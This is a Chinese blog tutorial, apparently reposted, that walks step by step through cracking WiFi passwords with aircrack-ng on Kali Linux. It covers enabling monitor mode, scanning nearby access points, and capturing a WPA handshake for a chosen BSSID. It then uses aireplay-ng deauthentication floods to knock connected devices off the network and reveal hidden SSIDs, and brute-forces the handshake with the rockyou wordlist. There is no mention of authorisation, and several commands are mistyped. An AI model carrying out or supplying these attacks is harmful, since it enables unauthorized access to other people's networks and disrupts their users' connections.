其他分享
首页 > 其他分享> > aircrack-ng教程 常用命令及作用

aircrack-ng教程 常用命令及作用

作者:互联网

配置一(虚拟机kali):

外接 无线网卡 

Vmware 将网络配置 设置为 仅主机模式

虚拟机连接usb无线网卡

测试结果:抓握手包会频繁掉线,无法正常使用

 

配置二(usb版kali):

上网本自带网卡不支持监听模式.

外接usb无线网卡可开启监听模式

测试结果:运行稳定,可抓握手包,可破解.

 

开始:

1.键入第一个命令:

airmon-ng check kill     

K掉影响网卡的进程,一般情况下,每次重启或者开机后这些进程都会自己开始,因此第一次使用都需要K掉这些进程(之后只要不重启或者关机都不用再次键入这个命令,直接开启就行,也就是第二个命令)

2.键入第二个命令:正常模式(Managed)

 Sudo ifconfig wlan0 down

Sudo iwconfig wlan0 mode monitor(开启监听模式)

Sudo ifconfig wlan0 up

iwconfig查看网卡mode是否处于监听模式

 

3.键入第三个命令:(ch频道号 enc加密方式)

Sudo airodump-ng wlan0 (查看附近wifi网络)

BSSID            PWR        Beacons    #Data, #/s  CH           MB      ENC    CIPHER  AUTH ESSID

2H:A6:8D:82:BC:7A  -52      751       41    0    270   WPA2 CCMP   PSK  HUAWEI

 A0:AA:CC:D7:89:47  -71      953       30    0   6  540   WPA2 CCMP   PSK  TP-LINK

 B8:BA:08:V0:YD:41  -86      559        1    0   5  130   OPN              Tenda

上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。按Ctrl-C结束。

4.键入第四个命令:(开始抓包)

airodump -w newdata -c 1 wlan0

解释:

-w表示保存握手包,“newdata”为包的名称,可随意设置,最终的文件为sofia-01.cap

-c 1表示指定频道1,wlan0指定网卡设备。

即开始在抓频道1上的包

当然我们也可以指定破解我们想要的AP

airodump-ng -w newdata -c 1 --bssid 2H:A6:8D:82:BC:7A wlan0

解释:--bssid嗅探指定无线AP,后面跟着AP的bssid,这时候可以等待握手包的获取。

 

英文解释:

1.BSSID–无线AP(路由器)的MAC地址,如果你想PJ哪个路由器的密码就把这个信息记下来备用。

2.PWR–这个值的大小反应信号的强弱,越大越好。很重要!!!

3.RXQ–丢包率,越小越好,此值对PJ密码影响不大,不必过于关注、

4.Beacons–准确的含义忘记了,大致就是反应客户端和AP的数据交换情况,通常此值不断变化。

5.#Data–这个值非常重要,直接影响到密码PJ的时间长短,如果有用户正在下载文件或看电影等大量数据传输的话,此值增长较快。 

6.CH–工作频道。

7.MB–连接速度

8.ENC–编码方式。通常有WEP、WPA、TKIP等方式,本文所介绍的方法在WEP下测试100%成功,其余方式本人 并未验证。

9.ESSID–可以简单的理解为局域网的名称,就是通常我们在搜索无线网络时看到的列表里面的各个网络的名称。

攻击隐藏wifi:

带有length:xx的就是隐藏wifi,名称我也不知道.执行命令

 airodump-ng -c 10 --bssid 50:FA:84:17:06:CC wlan0 

之后执行洪水攻击:

aireplay-ng -0 0 -a 50:FA:84:17:06:CC -c 80:FA:5B:xx:xx:xx wlan0mon

当对方重新进行连接时,监控窗口就会获取隐藏的wifi名称.

强制设备重新连接到路由器,若「有用户连接/重连接到wifi,即可抓到包」。但在实际情况中,可能在很长的时间中都没有用户连接WiFi,因此,「我们需要迫使用户重新连接WiFi」。 

而kali中有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;其原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。 

但是,「aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备」

从图中可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。 这里STATION为04:EA:56:91:88:13

「新开一个终端」,输入aireplay-ng -0 6 -c 50:FA:84:17:06:CC -a 4C:49:E3:4A:64:09 wlan0mon

参数解释:

-0发起deauthentication攻击,后面的数字为攻击次数,这里攻击6次

-c指定强制断开的设备,即上一步的STATION

-a指定无线路由器BSSID

按ctrl+c结束攻击。

当找到握手包 在之前设定的目录中可以找到形如xxx.cap的握手包, 若出现多个握手包,一般使用最后一个,或者使用其他工具查看有效的握手包。

 

爆破密码:

Aircrack -w /home/kali/Desktop/rockyou.txt -b 50:FA:84:17:06:CC /home/kali/Desktop/newdata1.cap

标签:握手,wifi,ng,网卡,wlan0,常用命令,连接,aircrack
来源: https://blog.csdn.net/weixin_50263804/article/details/110633008